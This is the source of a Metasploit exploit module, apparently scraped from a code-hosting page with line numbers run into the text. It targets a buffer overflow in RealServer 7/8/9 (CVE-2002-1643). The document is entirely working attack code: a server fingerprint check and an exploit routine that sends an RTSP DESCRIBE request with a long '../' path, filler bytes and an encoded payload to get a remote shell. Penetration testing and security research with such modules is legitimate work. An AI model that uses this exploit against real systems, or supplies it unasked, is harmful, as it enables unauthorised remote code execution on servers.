Path: blob/master/modules/exploits/multi/realserver/describe.rb
19500 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'RealServer Describe Buffer Overflow',15'Description' => %q{16This module exploits a buffer overflow in RealServer 7/8/917and was based on Johnny Cyberpunk's THCrealbad exploit. This18code should reliably exploit Linux, BSD, and Windows-based19servers.20},21'Author' => 'hdm',22'References' => [23[ 'CVE', '2002-1643' ],24[ 'OSVDB', '4468']25],26'Privileged' => true,27'Payload' => {28'Space' => 2000,29'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d"30},31'Platform' => %w{bsd linux win},32'Targets' => [33[34'Universal',35{36'Platform' => %w{bsd linux win}37},38],39],40'DisclosureDate' => '2002-12-20',41'DefaultTarget' => 0,42'Notes' => {43'Reliability' => UNKNOWN_RELIABILITY,44'Stability' => UNKNOWN_STABILITY,45'SideEffects' => UNKNOWN_SIDE_EFFECTS46}47)48)49end5051def check52res = send_request_raw(53{54'method' => 'OPTIONS',55'proto' => 'RTSP',56'version' => '1.0',57'uri' => '/'58}, 559)6061info = http_fingerprint({ :response => res }) # check method / Custom server check62if res and res['Server']63vprint_status("Found RTSP: #{res['Server']}")64return Exploit::CheckCode::Detected65end66Exploit::CheckCode::Safe67end6869def exploit70print_status("RealServer universal exploit launched against #{rhost}")71print_status("Kill the master rmserver pid to prevent shell disconnect")7273encoded = Rex::Text.to_hex(payload.encoded, "%")7475res = send_request_raw({76'method' => 'DESCRIBE',77'proto' => 'RTSP',78'version' => '1.0',79'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi"80}, 5)8182handler83end84end858687